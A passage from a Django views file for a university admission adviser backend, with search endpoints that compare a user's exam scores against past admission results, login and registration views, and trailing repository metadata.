spec_id = self.kwargs['spec_id']\n return OdcPlan.objects.filter(spec_id=spec_id)\n\n\n# searches\n\nclass SearchList(generics.ListAPIView):\n queryset = OdcResults.objects.all()\n serializer_class = SearchResultSerializer\n\n def get_queryset(self):\n summ = self.request.query_params['sum']\n spec_id = self.kwargs['spec_id']\n query = OdcResults.objects.all()\n query = query.filter(form_id=1, commercial_type_id=1, spec_id=spec_id)\n query = query.filter(result_type_id__in=(1,2))\n return query\n\nclass SearchList1(generics.ListAPIView):\n queryset = OdcPlan.objects.all()\n serializer_class = SearchResultSerializer\n\n def get_queryset(self):\n spec_id = self.kwargs['spec_id']\n query = OdcPlan.objects.all()\n query = query.filter(form_id=1, commercial_type_id=1, spec_id=spec_id)\n query = query.filter(result_type_id=1)\n return query\n\nclass Search1(generics.ListAPIView):\n queryset = OdcResultsBins.objects.all()\n serializer_class = OdcResultsBinsSerializer\n\n def list(self, request, *args, **kwargs):\n query = self.queryset\n specs = None\n if self.request.query_params.get('specs') is not None:\n specs = self.request.query_params.get('specs').split(',')\n query = self.queryset.filter(spec_id__in=specs).values().annotate(count=Count('spec_id'))\n hs = query.values('highschool_id').annotate(count=Count('highschool_id')).values_list('highschool_id', flat=True)\n highschools = OdcInfoHighschool.objects.filter(id__in=hs).values('name', 'raiting', 'id', 'website')\n query = query.values('highschool_id', 'result_type_id').annotate(\n below_150=Sum('below_150'),\n below_160=Sum('below_160'),\n below_170=Sum('below_170'),\n below_180=Sum('below_180'),\n below_190=Sum('below_190'),\n below_200=Sum('below_200'),\n below_210=Sum('below_210'),\n below_220=Sum('below_220'),\n below_230=Sum('below_230'),\n below_240=Sum('below_240'),\n below_250=Sum('below_250'),\n below_260=Sum('below_260'),\n below_270=Sum('below_270'),\n below_280=Sum('below_280'),\n below_290=Sum('below_290'),\n below_300=Sum('below_300'))\n all_results = []\n for item in highschools:\n all_results.append(item)\n for item in query:\n for result in all_results:\n if result['id'] == item['highschool_id']:\n result[item['result_type_id']] = item\n\n russian = get_int_param(self.request, 'russian')\n math = get_int_param(self.request, 'math')\n physics = get_int_param(self.request, 'physics')\n chemistry = get_int_param(self.request, 'chemistry')\n informatics = get_int_param(self.request, 'informatics')\n biology = get_int_param(self.request, 'biology')\n history = get_int_param(self.request, 'history')\n geography = get_int_param(self.request, 'geography')\n foreign_language = get_int_param(self.request, 'foreign_language')\n social_science = get_int_param(self.request, 'social_science')\n literature = get_int_param(self.request, 'literature')\n\n if specs is None:\n plans = OdcPlan.objects.filter(commercial_type='1', form='1')\n else:\n plans = OdcPlan.objects.filter(spec_id__in=specs, commercial_type='1', form='1')\n user_points = {}\n highschools = []\n for plan in plans:\n points = russian*plan.russian + math*plan.math + physics*plan.physics + \\\n chemistry*plan.chemistry + informatics*plan.informatics + \\\n biology*plan.biology + history*plan.history + geography*plan.geography + \\\n foreign_language*plan.foreign_language + social_science*plan.social_science + \\\n literature*plan.literature\n if plan.highschool_id not in user_points.keys():\n user_points[plan.highschool_id] = {}\n 
user_points[plan.highschool_id]['user_points'] = points\n user_points[plan.highschool_id]['all1'] = 0\n user_points[plan.highschool_id]['all2'] = 0\n user_points[plan.highschool_id]['good1'] = 0\n user_points[plan.highschool_id]['good2'] = 0\n highschools = user_points.keys()\n\n if specs is None:\n results = OdcResults.objects.filter(highschool_id__in=highschools,result_type_id__in=(1,2), commercial_type='1', form='1')\n else:\n results = OdcResults.objects.filter(spec_id__in=specs, highschool_id__in=highschools,result_type_id__in=(1,2), commercial_type='1', form='1')\n all_students = results.values('highschool_id', 'result_type').annotate(count=Count('result_type'))\n\n for a in all_students:\n user_points[a['highschool_id']]['all' + str(a['result_type'])] = a['count']\n for a in all_students:\n for i in range(1,3):\n all_students = results.filter(highschool_id=a['highschool_id'], total__lte=user_points[a['highschool_id']]['user_points'], result_type_id=i).values_list('total')\n user_points[a['highschool_id']]['good'+str(i)] = len(all_students)\n if user_points[a['highschool_id']]['all'+str(i)] > 0:\n user_points[a['highschool_id']]['percent'+str(i)] = 100 * user_points[a['highschool_id']]['good'+str(i)] / user_points[a['highschool_id']]['all'+str(i)]\n else:\n user_points[a['highschool_id']]['percent'+str(i)] = 0\n\n for a in all_results:\n a['points'] = {}\n if a['id'] in user_points.keys():\n a['points'] = user_points[a['id']]\n\n return Response({'results': all_results})\n\nclass Search2(generics.ListAPIView):\n queryset = OdcResultsBins.objects.all()\n serializer_class = OdcResultsBinsSerializer\n\n def list(self, request, *args, **kwargs):\n query = self.queryset\n\n specs = None\n if self.request.query_params.get('specs') is not None:\n specs = self.request.query_params.get('specs').split(',')\n query = self.queryset.filter(spec_id__in=specs)\n\n highschool_id = self.kwargs['highschool']\n highschools = OdcInfoHighschool.objects.filter(id=highschool_id).values()\n\n query = query.filter(highschool_id=highschool_id).values('spec_id', 'result_type').annotate(\n below_150=Sum('below_150'),\n below_160=Sum('below_160'),\n below_170=Sum('below_170'),\n below_180=Sum('below_180'),\n below_190=Sum('below_190'),\n below_200=Sum('below_200'),\n below_210=Sum('below_210'),\n below_220=Sum('below_220'),\n below_230=Sum('below_230'),\n below_240=Sum('below_240'),\n below_250=Sum('below_250'),\n below_260=Sum('below_260'),\n below_270=Sum('below_270'),\n below_280=Sum('below_280'),\n below_290=Sum('below_290'),\n below_300=Sum('below_300'))\n all_results = []\n for item in highschools:\n item['specs'] = {}\n for q in query:\n item['specs'][q['spec_id']] = {}\n all_results.append(item)\n for item in highschools:\n for q in query:\n item['specs'][q['spec_id']][q['result_type']] = q\n # if result['id'] == item['highschool_id']:\n # result[item['result_type_id']] = item\n\n russian = get_int_param(self.request, 'russian')\n math = get_int_param(self.request, 'math')\n physics = get_int_param(self.request, 'physics')\n chemistry = get_int_param(self.request, 'chemistry')\n informatics = get_int_param(self.request, 'informatics')\n biology = get_int_param(self.request, 'biology')\n history = get_int_param(self.request, 'history')\n geography = get_int_param(self.request, 'geography')\n foreign_language = get_int_param(self.request, 'foreign_language')\n social_science = get_int_param(self.request, 'social_science')\n literature = get_int_param(self.request, 'literature')\n\n if specs is None:\n 
plans = OdcPlan.objects.filter(highschool_id=highschool_id, commercial_type='1', form='1')\n else:\n plans = OdcPlan.objects.filter(highschool_id=highschool_id, spec_id__in=specs, commercial_type='1', form='1')\n user_points = {}\n user_points['highschool'] = highschools\n user_points['specs'] = {}\n for plan in plans:\n points = russian*plan.russian + math*plan.math + physics*plan.physics + \\\n chemistry*plan.chemistry + informatics*plan.informatics + \\\n biology*plan.biology + history*plan.history + geography*plan.geography + \\\n foreign_language*plan.foreign_language + social_science*plan.social_science + \\\n literature*plan.literature\n if plan.spec_id not in user_points.keys():\n user_points['specs'][plan.spec_id] = {}\n user_points['specs'][plan.spec_id] = {}\n user_points['specs'][plan.spec_id]['user_points'] = points\n user_points['specs'][plan.spec_id]['all1'] = 0\n user_points['specs'][plan.spec_id]['all2'] = 0\n user_points['specs'][plan.spec_id]['good1'] = 0\n user_points['specs'][plan.spec_id]['good2'] = 0\n\n if specs is None:\n results = OdcResults.objects.filter(highschool_id=highschool_id,result_type_id__in=(1,2), commercial_type='1', form='1')\n else:\n results = OdcResults.objects.filter(spec_id__in=specs, highschool_id=highschool_id,result_type_id__in=(1,2), commercial_type='1', form='1')\n all_students = results.values('highschool_id', 'spec_id', 'result_type').annotate(count=Count('result_type'))\n for a in all_students:\n user_points['specs'][a['spec_id']]['all' + str(a['result_type'])] = a['count']\n for a in all_students:\n for i in range(1,3):\n all_students = results.filter(highschool_id=highschool_id,\n spec_id=a['spec_id'],\n total__lte=user_points['specs'][a['spec_id']]['user_points'],\n result_type_id=i).values_list('total')\n user_points['specs'][a['spec_id']]['good'+str(i)] = len(all_students)\n if user_points['specs'][a['spec_id']]['all'+str(i)] > 0:\n user_points['specs'][a['spec_id']]['percent'+str(i)] = 100 * user_points['specs'][a['spec_id']]['good'+str(i)] / user_points['specs'][a['spec_id']]['all'+str(i)]\n else:\n user_points['specs'][a['spec_id']]['percent'+str(i)] = 0\n\n for a in all_results[0]['specs'].keys():\n spec = all_results[0]['specs'][a]\n spec['points'] = {}\n if a in user_points['specs'].keys():\n spec['points'] = user_points['specs'][a]\n\n return Response({'results': all_results})\n\ndef login(request):\n ctx = {}\n from .forms import RegistrationForm\n ctx['form'] = RegistrationForm\n return render(request, 'login.html', ctx)\n\n@unauthenticated_only(url='core.views.index')\ndef signup(request):\n ctx = {}\n from .forms import RegistrationForm\n ctx['form'] = RegistrationForm\n return render(request, 'signup.html', ctx)\n\n@require_post(url='core.views.index')\n@unauthenticated_only(url='core.views.index')\ndef do_login(request):\n username = request.POST['email']\n password = request.POST['password']\n from django.contrib.auth import authenticate, login\n user = authenticate(username=username, password=password)\n if user is not None:\n if user.is_active:\n login(request, user)\n put_user_info_into_session(request)\n return redirect('core.views.index')\n else:\n return redirect(reverse('core.views.login') + '?error=inactive')\n else:\n return redirect(reverse('core.views.login') + '?error=incorrect')\n\n@require_post(url='core.views.index')\n@unauthenticated_only(url='core.views.index')\ndef do_register(request):\n ctx = {}\n email = request.POST['email']\n password = request.POST['password']\n if not email or not password:\n 
return redirect(reverse('core.views.signup') + '?error=fields_empty')\n    if len(password) < 6:\n        return redirect(reverse('core.views.signup') + '?error=password_short')\n    try:\n        User.objects.get(email=email)\n        return redirect(reverse('core.views.signup') + '?error=email_used')\n    except User.DoesNotExist:\n        user = User.objects.create_user(email, email, password)\n        user.user_info = UserInfo(user=user)\n        user.user_info.save()\n        user.is_active = True\n        user.save()\n        from django.contrib.auth import authenticate, login\n        user = authenticate(username=email, password=password)\n        login(request, user)\n        ctx.update({'response': 'success', 'message': u'You have successfully registered'})\n    return redirect('core.views.index')\n\n@require_login(url='core.views.index')\ndef do_logout(request):\n    from django.contrib.auth import logout\n    logout(request)\n    return redirect('core.views.index')", "repo_name": "bshishov/ODC.HighSchoolAdviser.Backend", "sub_path": "HighSchoolAdviser/core/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 32261, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "models.OdcInfoHighschool.objects.get", "line_number": 26, "usage_type": "call"}, {"api_name": "models.OdcInfoHighschool.objects", "line_number": 26, "usage_type": "attribute"}, {"api_name": "models.OdcInfoHighschool", "line_number": 26, "usage_type": "name"}, {"api_name": "models.OdcPlanType.objects.all", "line_number": 27, "usage_type": "call"}, {"api_name": "models.OdcPlanType.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "models.OdcPlanType", "line_number": 27, "usage_type": "name"}, {"api_name": "models.OdcPlan.objects.select_related", "line_number": 37, "usage_type": "call"}, {"api_name": "models.OdcPlan.objects", "line_number": 37, "usage_type": "attribute"}, {"api_name": "models.OdcPlan", "line_number": 37, "usage_type": "name"}, {"api_name": "models.OdcResults.objects.filter", "line_number": 55, "usage_type": "call"}, {"api_name": "models.OdcResults.objects", "line_number": 55, "usage_type": "attribute"}, {"api_name": "models.OdcResults", "line_number": 55, "usage_type": "name"}, {"api_name": "django.db.models.Count", "line_number": 56, "usage_type": "call"}, {"api_name": "models.OdcPlan.objects.select_related", "line_number": 79, "usage_type": "call"}, {"api_name": "models.OdcPlan.objects", "line_number": 79, "usage_type": "attribute"}, {"api_name": "models.OdcPlan", "line_number": 79, "usage_type": "name"}, {"api_name": "models.OdcPlan.objects.select_related", "line_number": 81, "usage_type": "call"}, {"api_name": "models.OdcPlan.objects", "line_number": 81, "usage_type": "attribute"}, {"api_name": "models.OdcPlan", "line_number": 81, "usage_type": "name"}, {"api_name": "django.db.models.Count", "line_number": 82, "usage_type": "call"}, {"api_name": "models.OdcInfoHighschool.objects.filter", "line_number": 83, "usage_type": "call"}, {"api_name": "models.OdcInfoHighschool.objects", "line_number": 83, "usage_type": "attribute"}, {"api_name": "models.OdcInfoHighschool", "line_number": 83, "usage_type": "name"}, {"api_name": "models.OdcResults.objects.filter", "line_number": 85, "usage_type": "call"}, {"api_name": "models.OdcResults.objects", "line_number": 85, "usage_type": "attribute"}, {"api_name": "models.OdcResults", "line_number": 85, "usage_type": "name"}, {"api_name": "models.OdcResults.objects.filter", "line_number": 87, "usage_type": "call"}, {"api_name": "models.OdcResults.objects", 
"line_number": 87, "usage_type": "attribute"}, {"api_name": "models.OdcResults", "line_number": 87, "usage_type": "name"}, {"api_name": "django.db.models.Count", "line_number": 88, "usage_type": "call"}, {"api_name": "models.OdcPlan.objects.select_related", "line_number": 153, "usage_type": "call"}, {"api_name": "models.OdcPlan.objects", "line_number": 153, "usage_type": "attribute"}, {"api_name": "models.OdcPlan", "line_number": 153, "usage_type": "name"}, {"api_name": "models.OdcInfoHighschool.objects.get", "line_number": 156, "usage_type": "call"}, {"api_name": "models.OdcInfoHighschool.objects", "line_number": 156, "usage_type": "attribute"}, {"api_name": "models.OdcInfoHighschool", "line_number": 156, "usage_type": "name"}, {"api_name": "models.OdcResults.objects.filter", "line_number": 157, "usage_type": "call"}, {"api_name": "models.OdcResults.objects", "line_number": 157, "usage_type": "attribute"}, {"api_name": "models.OdcResults", "line_number": 157, "usage_type": "name"}, {"api_name": "django.db.models.Count", "line_number": 158, "usage_type": "call"}, {"api_name": "models.OdcResultsBins.objects.filter", "line_number": 159, "usage_type": "call"}, {"api_name": "models.OdcResultsBins.objects", "line_number": 159, "usage_type": "attribute"}, {"api_name": "models.OdcResultsBins", "line_number": 159, "usage_type": "name"}, {"api_name": "django.db.models.Count", "line_number": 159, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 162, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 163, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 164, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 165, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 166, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 167, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 168, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 169, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 170, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 171, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 172, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 173, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 174, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 175, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 176, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 177, "usage_type": "call"}, {"api_name": "models.OdcInfoSpec.objects.select_related", "line_number": 213, "usage_type": "call"}, {"api_name": "models.OdcInfoSpec.objects", "line_number": 213, "usage_type": "attribute"}, {"api_name": "models.OdcInfoSpec", "line_number": 213, "usage_type": "name"}, {"api_name": "models.OdcPlan.objects.select_related", "line_number": 215, "usage_type": "call"}, {"api_name": "models.OdcPlan.objects", "line_number": 215, "usage_type": "attribute"}, {"api_name": "models.OdcPlan", "line_number": 215, "usage_type": "name"}, {"api_name": "models.OdcInfoSpec.objects.select_related", "line_number": 234, "usage_type": "call"}, {"api_name": "models.OdcInfoSpec.objects", "line_number": 234, "usage_type": "attribute"}, {"api_name": "models.OdcInfoSpec", "line_number": 234, "usage_type": "name"}, {"api_name": 
"models.OdcInfoHighschool.objects.order_by", "line_number": 243, "usage_type": "call"}, {"api_name": "models.OdcInfoHighschool.objects", "line_number": 243, "usage_type": "attribute"}, {"api_name": "models.OdcInfoHighschool", "line_number": 243, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 257, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 247, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 270, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 260, "usage_type": "name"}, {"api_name": "models.OdcInfoHighschool.objects.filter", "line_number": 279, "usage_type": "call"}, {"api_name": "models.OdcInfoHighschool.objects", "line_number": 279, "usage_type": "attribute"}, {"api_name": "models.OdcInfoHighschool", "line_number": 279, "usage_type": "name"}, {"api_name": "models.OdcPlan.objects.filter", "line_number": 285, "usage_type": "call"}, {"api_name": "models.OdcPlan.objects", "line_number": 285, "usage_type": "attribute"}, {"api_name": "models.OdcPlan", "line_number": 285, "usage_type": "name"}, {"api_name": "models.OdcResults.objects.filter", "line_number": 286, "usage_type": "call"}, {"api_name": "models.OdcResults.objects", "line_number": 286, "usage_type": "attribute"}, {"api_name": "models.OdcResults", "line_number": 286, "usage_type": "name"}, {"api_name": "django.db.models.Min", "line_number": 295, "usage_type": "call"}, {"api_name": "django.db.models.Min", "line_number": 296, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 297, "usage_type": "call"}, {"api_name": "models.OdcPlan.objects.select_related", "line_number": 319, "usage_type": "call"}, {"api_name": "models.OdcPlan.objects", "line_number": 319, "usage_type": "attribute"}, {"api_name": "models.OdcPlan", "line_number": 319, "usage_type": "name"}, {"api_name": "models.OdcResults.objects.filter", "line_number": 320, "usage_type": "call"}, {"api_name": "models.OdcResults.objects", "line_number": 320, "usage_type": "attribute"}, {"api_name": "models.OdcResults", "line_number": 320, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 349, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 346, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ReadOnlyModelViewSet", "line_number": 378, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 378, "usage_type": "name"}, {"api_name": "models.OdcInfoHighschool.objects.all", "line_number": 379, "usage_type": "call"}, {"api_name": "models.OdcInfoHighschool.objects", "line_number": 379, "usage_type": "attribute"}, {"api_name": "models.OdcInfoHighschool", "line_number": 379, "usage_type": "name"}, {"api_name": "serializers.HighSchoolSerializer", "line_number": 380, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ReadOnlyModelViewSet", "line_number": 382, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 382, "usage_type": "name"}, {"api_name": "models.OdcInfoHighschool.objects.all", "line_number": 383, "usage_type": "call"}, {"api_name": "models.OdcInfoHighschool.objects", "line_number": 383, "usage_type": "attribute"}, {"api_name": "models.OdcInfoHighschool", "line_number": 383, "usage_type": "name"}, {"api_name": "serializers.HighSchoolWithResultsSerializer", "line_number": 384, "usage_type": "name"}, {"api_name": 
"rest_framework.generics.ListAPIView", "line_number": 386, "usage_type": "attribute"}, {"api_name": "rest_framework.generics", "line_number": 386, "usage_type": "name"}, {"api_name": "serializers.ShortOdcResultsSerializer", "line_number": 387, "usage_type": "name"}, {"api_name": "models.OdcResults.objects.filter", "line_number": 393, "usage_type": "call"}, {"api_name": "models.OdcResults.objects", "line_number": 393, "usage_type": "attribute"}, {"api_name": "models.OdcResults", "line_number": 393, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 404, "usage_type": "call"}, {"api_name": "rest_framework.viewsets.ReadOnlyModelViewSet", "line_number": 409, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 409, "usage_type": "name"}, {"api_name": "models.OdcInfoSpec.objects.all", "line_number": 410, "usage_type": "call"}, {"api_name": "models.OdcInfoSpec.objects", "line_number": 410, "usage_type": "attribute"}, {"api_name": "models.OdcInfoSpec", "line_number": 410, "usage_type": "name"}, {"api_name": "serializers.SpecSerializer", "line_number": 411, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ReadOnlyModelViewSet", "line_number": 414, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 414, "usage_type": "name"}, {"api_name": "models.OdcInfoSpecGroup.objects.all", "line_number": 415, "usage_type": "call"}, {"api_name": "models.OdcInfoSpecGroup.objects", "line_number": 415, "usage_type": "attribute"}, {"api_name": "models.OdcInfoSpecGroup", "line_number": 415, "usage_type": "name"}, {"api_name": "serializers.SpecGroupSerializer", "line_number": 416, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ReadOnlyModelViewSet", "line_number": 419, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 419, "usage_type": "name"}, {"api_name": "models.OdcInfoSpecGroup.objects.all", "line_number": 420, "usage_type": "call"}, {"api_name": "models.OdcInfoSpecGroup.objects", "line_number": 420, "usage_type": "attribute"}, {"api_name": "models.OdcInfoSpecGroup", "line_number": 420, "usage_type": "name"}, {"api_name": "serializers.GroupSerializer", "line_number": 421, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ReadOnlyModelViewSet", "line_number": 427, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 427, "usage_type": "name"}, {"api_name": "models.OdcResults.objects.all", "line_number": 428, "usage_type": "call"}, {"api_name": "models.OdcResults.objects", "line_number": 428, "usage_type": "attribute"}, {"api_name": "models.OdcResults", "line_number": 428, "usage_type": "name"}, {"api_name": "serializers.OdcResultsSerializer", "line_number": 429, "usage_type": "name"}, {"api_name": "rest_framework.generics.ListAPIView", "line_number": 431, "usage_type": "attribute"}, {"api_name": "rest_framework.generics", "line_number": 431, "usage_type": "name"}, {"api_name": "models.OdcResults.objects.all", "line_number": 432, "usage_type": "call"}, {"api_name": "models.OdcResults.objects", "line_number": 432, "usage_type": "attribute"}, {"api_name": "models.OdcResults", "line_number": 432, "usage_type": "name"}, {"api_name": "serializers.OdcResultsSerializer", "line_number": 433, "usage_type": "name"}, {"api_name": "models.OdcResults.objects.all", "line_number": 437, "usage_type": "call"}, {"api_name": "models.OdcResults.objects", "line_number": 437, "usage_type": "attribute"}, {"api_name": "models.OdcResults", 
"line_number": 437, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ReadOnlyModelViewSet", "line_number": 443, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 443, "usage_type": "name"}, {"api_name": "models.OdcPlan.objects.all", "line_number": 444, "usage_type": "call"}, {"api_name": "models.OdcPlan.objects", "line_number": 444, "usage_type": "attribute"}, {"api_name": "models.OdcPlan", "line_number": 444, "usage_type": "name"}, {"api_name": "serializers.PlanSerializer", "line_number": 445, "usage_type": "name"}, {"api_name": "rest_framework.generics.ListAPIView", "line_number": 447, "usage_type": "attribute"}, {"api_name": "rest_framework.generics", "line_number": 447, "usage_type": "name"}, {"api_name": "serializers.PlanSerializer", "line_number": 448, "usage_type": "name"}, {"api_name": "models.OdcInfoSpec.objects.filter", "line_number": 452, "usage_type": "call"}, {"api_name": "models.OdcInfoSpec.objects", "line_number": 452, "usage_type": "attribute"}, {"api_name": "models.OdcInfoSpec", "line_number": 452, "usage_type": "name"}, {"api_name": "models.OdcPlan.objects.filter", "line_number": 453, "usage_type": "call"}, {"api_name": "models.OdcPlan.objects", "line_number": 453, "usage_type": "attribute"}, {"api_name": "models.OdcPlan", "line_number": 453, "usage_type": "name"}, {"api_name": "rest_framework.generics.ListAPIView", "line_number": 455, "usage_type": "attribute"}, {"api_name": "rest_framework.generics", "line_number": 455, "usage_type": "name"}, {"api_name": "serializers.PlanSerializer", "line_number": 456, "usage_type": "name"}, {"api_name": "models.OdcPlan.objects.filter", "line_number": 460, "usage_type": "call"}, {"api_name": "models.OdcPlan.objects", "line_number": 460, "usage_type": "attribute"}, {"api_name": "models.OdcPlan", "line_number": 460, "usage_type": "name"}, {"api_name": "rest_framework.generics.ListAPIView", "line_number": 465, "usage_type": "attribute"}, {"api_name": "rest_framework.generics", "line_number": 465, "usage_type": "name"}, {"api_name": "models.OdcResults.objects.all", "line_number": 466, "usage_type": "call"}, {"api_name": "models.OdcResults.objects", "line_number": 466, "usage_type": "attribute"}, {"api_name": "models.OdcResults", "line_number": 466, "usage_type": "name"}, {"api_name": "serializers.SearchResultSerializer", "line_number": 467, "usage_type": "name"}, {"api_name": "models.OdcResults.objects.all", "line_number": 472, "usage_type": "call"}, {"api_name": "models.OdcResults.objects", "line_number": 472, "usage_type": "attribute"}, {"api_name": "models.OdcResults", "line_number": 472, "usage_type": "name"}, {"api_name": "rest_framework.generics.ListAPIView", "line_number": 477, "usage_type": "attribute"}, {"api_name": "rest_framework.generics", "line_number": 477, "usage_type": "name"}, {"api_name": "models.OdcPlan.objects.all", "line_number": 478, "usage_type": "call"}, {"api_name": "models.OdcPlan.objects", "line_number": 478, "usage_type": "attribute"}, {"api_name": "models.OdcPlan", "line_number": 478, "usage_type": "name"}, {"api_name": "serializers.SearchResultSerializer", "line_number": 479, "usage_type": "name"}, {"api_name": "models.OdcPlan.objects.all", "line_number": 483, "usage_type": "call"}, {"api_name": "models.OdcPlan.objects", "line_number": 483, "usage_type": "attribute"}, {"api_name": "models.OdcPlan", "line_number": 483, "usage_type": "name"}, {"api_name": "rest_framework.generics.ListAPIView", "line_number": 488, "usage_type": "attribute"}, {"api_name": 
"rest_framework.generics", "line_number": 488, "usage_type": "name"}, {"api_name": "models.OdcResultsBins.objects.all", "line_number": 489, "usage_type": "call"}, {"api_name": "models.OdcResultsBins.objects", "line_number": 489, "usage_type": "attribute"}, {"api_name": "models.OdcResultsBins", "line_number": 489, "usage_type": "name"}, {"api_name": "serializers.OdcResultsBinsSerializer", "line_number": 490, "usage_type": "name"}, {"api_name": "django.db.models.Count", "line_number": 497, "usage_type": "call"}, {"api_name": "django.db.models.Count", "line_number": 498, "usage_type": "call"}, {"api_name": "models.OdcInfoHighschool.objects.filter", "line_number": 499, "usage_type": "call"}, {"api_name": "models.OdcInfoHighschool.objects", "line_number": 499, "usage_type": "attribute"}, {"api_name": "models.OdcInfoHighschool", "line_number": 499, "usage_type": "name"}, {"api_name": "django.db.models.Sum", "line_number": 501, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 502, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 503, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 504, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 505, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 506, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 507, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 508, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 509, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 510, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 511, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 512, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 513, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 514, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 515, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 516, "usage_type": "call"}, {"api_name": "models.OdcPlan.objects.filter", "line_number": 538, "usage_type": "call"}, {"api_name": "models.OdcPlan.objects", "line_number": 538, "usage_type": "attribute"}, {"api_name": "models.OdcPlan", "line_number": 538, "usage_type": "name"}, {"api_name": "models.OdcPlan.objects.filter", "line_number": 540, "usage_type": "call"}, {"api_name": "models.OdcPlan.objects", "line_number": 540, "usage_type": "attribute"}, {"api_name": "models.OdcPlan", "line_number": 540, "usage_type": "name"}, {"api_name": "models.OdcResults.objects.filter", "line_number": 559, "usage_type": "call"}, {"api_name": "models.OdcResults.objects", "line_number": 559, "usage_type": "attribute"}, {"api_name": "models.OdcResults", "line_number": 559, "usage_type": "name"}, {"api_name": "models.OdcResults.objects.filter", "line_number": 561, "usage_type": "call"}, {"api_name": "models.OdcResults.objects", "line_number": 561, "usage_type": "attribute"}, {"api_name": "models.OdcResults", "line_number": 561, "usage_type": "name"}, {"api_name": "django.db.models.Count", "line_number": 562, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 580, "usage_type": "call"}, {"api_name": "rest_framework.generics.ListAPIView", "line_number": 582, "usage_type": "attribute"}, {"api_name": "rest_framework.generics", "line_number": 582, "usage_type": "name"}, {"api_name": 
"models.OdcResultsBins.objects.all", "line_number": 583, "usage_type": "call"}, {"api_name": "models.OdcResultsBins.objects", "line_number": 583, "usage_type": "attribute"}, {"api_name": "models.OdcResultsBins", "line_number": 583, "usage_type": "name"}, {"api_name": "serializers.OdcResultsBinsSerializer", "line_number": 584, "usage_type": "name"}, {"api_name": "models.OdcInfoHighschool.objects.filter", "line_number": 595, "usage_type": "call"}, {"api_name": "models.OdcInfoHighschool.objects", "line_number": 595, "usage_type": "attribute"}, {"api_name": "models.OdcInfoHighschool", "line_number": 595, "usage_type": "name"}, {"api_name": "django.db.models.Sum", "line_number": 598, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 599, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 600, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 601, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 602, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 603, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 604, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 605, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 606, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 607, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 608, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 609, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 610, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 611, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 612, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 613, "usage_type": "call"}, {"api_name": 